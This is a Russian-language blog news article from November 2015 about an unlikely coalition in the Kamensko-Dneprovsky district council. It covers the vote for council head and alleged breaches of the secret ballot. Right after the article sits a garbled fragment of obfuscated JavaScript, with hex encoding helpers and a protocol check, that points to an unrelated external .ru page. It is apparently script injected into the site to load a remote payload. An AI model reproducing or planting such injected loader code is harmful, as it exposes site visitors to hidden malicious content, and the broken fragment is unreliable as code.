ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

КУМЕ, ЙДИ ДО МЕНЕ! В Каменско-Днепровском районном совете «Оппоблок» и партии Майдана создали «цветную коалицию»

Posted by operkor на Ноябрь 20, 2015

КУМВ новоизбранных местных советах Запорожской области продолжают фиксироваться случаи удивительного единодушия между фракциями партий, исповедующих противоположные ценности, – «Оппозиционным блоком» и демократическими политсилами. Главами Васильевского, Запорожского и Михайловского районных советов в результате договоренностей между «оппозиционерами» и «демократами» уже избраны выдвиженцы «Оппоблока». Аналогичная ситуация произошла и в Каменско-Днепровском районе.

По итогам выборов «Оппозиционный блок» получил в райсовете ровно половину депутатских мест – 17. От партии «Наш край» в совет прошли 6 депутатов, от «БПП-Солидарность» — 3, по 2 депутата от «Відродження», УКРОПа, Радикальной партии Ляшко и «Батьківщини».

Таким образом, в райсовете должна была сформироваться конструктивная коалиция, которая стала бы реальным противовесом монополии «Оппоблока» на протягивание нужных ему решений. И такие действия полностью отвечали бы предвыборным обещаниям представителей демократических политсил. К сожалению, в ходе первой же сессии новоизбранного Каменско-Днепровского райсовета выяснилось, что «коалиция» будет сформирована совсем по другим принципам.

Начало формированию такой противоестественной коалиции было положено17 ноября, когда депутаты тайным голосованием выбирали главу районного совета. На эту должность были выдвинуты Ирина Зыкова от «Нашего края» и Геннадий Олененко от «Оппоблока». Ирина Зыкова – управленец с многолетним опытом работы, и при должной консолидации ответственных депутатов именно она должна была получить максимальную поддержку коллег из демократического лагеря. Однако Зыкова набрала только 10 голосов, в то время как Олененко получил 23 голоса и в результате стал председателем райсовета.

Кто же так усердно «помогал» кандидату от «Оппозиционного блока»? Ответ на этот вопрос, увы, лежит на поверхности. Поскольку на сессии отсутствовал один из депутатов фракции «Батьківщина», несложно подсчитать, сколько дополнительных голосов получили каждый из кандидатов. «Наш край» и «Оппоблок» голосовали, разумеется, за своих выдвиженцев, еще 4 депутата из других фракций проголосовали за Зыкову, остальные 6 – за Олененко. Факт того, что за ставленника своего главного политического оппонента проголосовали депутаты из «партий Майдана», как говорится, налицо.

Удручающее зрелище представлял собой и сам процесс «тайного» голосования депутатов-патриотов за представителя партии, которую спонсирует Ринат Ахметов. Некоторые депутаты, укрывшись в кабинках для голосования, ставили отметки в бюллетенях собственными ЦВЕТНЫМИ ручками, игнорируя традиционные одноцветные ручки, имеющиеся в кабинках. Эти уловки до боли напоминают один из популярнейших способов подкупа избирателей, когда для получения вознаграждения нужно было сфотографировать свой бюллетень с галочкой, поставленной напротив нужной партии или фамилии.

В дополнение к знакомой картинке стоит отметить, что «кураторы» от «Оппозиционного блока» в лице Владимира Антоненко и Александра Григорчука во время голосования стояли рядом с урнами и бдительно контролировали процесс. А члены УКРОПа и партии Ляшко, которые яростно отстаивали на Майдане идеалы демократии, послушно демонстрировали наблюдателям от «Оппоблока» «правильно заполненные» бюллетени, перед тем как опустить их в урну.

Показательно, что счетная комиссия никак не отреагировала на предложение составить акт о нарушении, несмотря на то, что один из членов комиссии отказался подписывать протокол, а другой отозвал свою подпись. Налицо явная самонадеянность «коалициантов», решивших объединяться в открытую. Чем обернется для жителей Каменско-Днепровского района такая сплоченность в действиях недавних непримиримых политических противников, покажет время.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "operkor.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: